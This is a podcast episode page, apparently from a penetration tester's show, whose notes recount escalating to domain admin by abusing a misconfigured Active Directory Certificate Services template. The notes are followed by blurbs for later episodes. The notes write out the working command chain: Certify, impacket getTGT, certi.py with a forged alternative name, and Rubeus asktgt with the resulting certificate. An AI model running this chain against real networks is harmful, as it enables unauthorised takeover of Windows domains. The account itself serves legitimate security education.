7MS #501: Tales of Pentest Pwnage - Part 31

7MS #501: Tales of Pentest Pwnage - Part 31

Today we're closing down 2021 with a tale of pentest pwnage - this time with a path to DA I had never had a chance to abuse before: Active Directory Certificate Services! For the full gory details on this attack path, see the Certified Pre-Owned paper from the SpecterOps crew. The TLDR/TLDL version of how I abused this path is as follows:

Run Certify.exe find /vulnerable, and if you get some findings, review the Certified Pre-Owned paper and the Certify readme file for guidance on how to exploit them. In my case, the results I got from Certify showed:

msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT

Reading through the Certify readme, I learned "This allows anyone to enroll in this template and specify an arbitrary Subject Alternative Name (i.e. as a DA)." The Certify readme file walks you through how to attack this config specifically, but I had some trouble running all the tools from my non-domain-joined machine. So I used a combination of Certify and Certi to get the job done. First I started on Kali with the following commands:

sudo python3 /opt/impacket/examples/getTGT.py 'victimdomain.domain/MYUSER:MYPASS' export KRB5CCNAME=myuser.cache sudo python3 ./certi.py req 'victimdomain.domain/MYUSER@FQDN.TO.CERT.SERVER' THE-ENTERPRISE-CA-NAME -k -n --alt-name DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE --template VULNERABLE-TEMPLATE NAME

From that you will get a .pfx file which you can bring over to your non-domain-joined machine and do:

rubeus.exe purge rubeus.exe asktgt /user:DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE /certificate:DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE@victim.domain.pfx /password:PASSWORD-TO-MY-PFX-FILE /domain:victimdomain.domain /dc:IP.OF.DOMAIN.CONTROLLER

And that's it! Do a dir \\FQDN.TO.DOMAIN.CONTROLLER\C$ and enjoy your new super powers!

Det här avsnittet är hämtat från ett öppet RSS-flöde och publiceras inte av Podme. Det kan innehålla reklam.

Avsnitt(730)

7MS #730: Baby's First Project Swarm

7MS #730: Baby's First Project Swarm

Hey friends! Still your grieving pal over here, but also your swarming friend and Protecting My Network Edge host — because this week I've been tinkering with something called Project Swarm and I've g...

10 Juli 25min

7MS #729: Pwning Dracarys

7MS #729: Pwning Dracarys

Hey friends! Still your grieving pal over here, but also your happy hacking host — because today we're diving into baby's first Dracarys! (Yes, I'm probably pronouncing that wrong. Yes, I'm going to k...

4 Juli 18min

7MS #728: Securing Your Family During and After a Disaster – Part 8

7MS #728: Securing Your Family During and After a Disaster – Part 8

Hey friends! This is a tough one to write. My dad passed away on Friday, and instead of the hacker-y tech episode I had planned, I pivoted to something more personal — another installment of our "Secu...

30 Juni 38min

7MS #727: Securing Your Mental Health – Part 7

7MS #727: Securing Your Mental Health – Part 7

Hello friends! It's been over a year since we did a dedicated mental health episode, so today I'm doing a big catch-up and running through my 7-point plan for being a more mentally secure me. None of ...

19 Juni 21min

7MS #726: Baby's First Hermes

7MS #726: Baby's First Hermes

Hello friends! I've been on a bit of an AI agent journey lately, and today I'm sharing my experience ditching OpenClaw and going all-in on Hermes — a self-hosted AI agent built by Nous Research. A Net...

12 Juni 22min

7MS #725: Building a Bulletproof Backup Solution

7MS #725: Building a Bulletproof Backup Solution

Hey friends! Backups are not as cool as pentesting, but boy do they matter when things go sideways. This week I'm sharing how a Proxmox backup disk space meltdown led me to a completely overhauled — a...

5 Juni 21min

7MS #724: Tales of Pentest Pwnage - Part 85

7MS #724: Tales of Pentest Pwnage - Part 85

Hey friends! Today we're going deep on external network pentesting — something I realize we've barely touched in however many episodes we've done. I'm currently in a long stretch of back-to-back exter...

29 Maj 30min

7MS #723: CARTP - Cloud Red Team Tactics for Attacking and Defending Azure - Part 1

7MS #723: CARTP - Cloud Red Team Tactics for Attacking and Defending Azure - Part 1

Hello friends! Today's a hybrid episode — some security content up top about a new certification I've kicked off, followed by an aggressively quick trip to Tangent Town. Feel free to bail after the se...

23 Maj 32min

Populärt inom Politik & nyheter

aftonbladet-krim
svenska-fall
p3-krim
tv4-nyheterna-story
aftonbladet-daily
flashback-forever
rss-vad-fan-hande
motiv
de-fyras-gang
rss-krimreportrarna
rss-krimstad
spar
rss-sanning-konsekvens
rss-frandfors-horna
rss-flodet
mannen-utan-spar
rss-aftonbladet-krim
kungligt
politiken
krimmagasinet